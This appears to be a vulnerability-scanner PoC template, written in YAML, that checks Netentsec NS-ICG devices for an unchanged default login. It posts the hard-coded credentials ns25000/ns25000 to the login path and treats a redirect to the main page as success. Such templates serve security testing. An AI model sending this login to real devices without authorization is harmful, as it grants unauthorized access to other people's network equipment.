name: yaml-poc-netentsec-ns_icg-unsafe_config-CT-158139
binding: e3b116f2-1442-48bc-a7c7-af56704d9399
detail:
    author: lianjian.chen
    vulnerability:
        id: 2d17e00f-24bd-42f9-804e-e4fbf1e024a5
        level: high
    warning: Harmless
transport: http
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /user/login/login
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: usrname=ns25000&pass=ns25000&signinfo=&ukey_user_flag=0&SlotSerialNumber=
        expression: response.status == 302 && response.headers["Location"] == "/user/main/"
expression: r0()
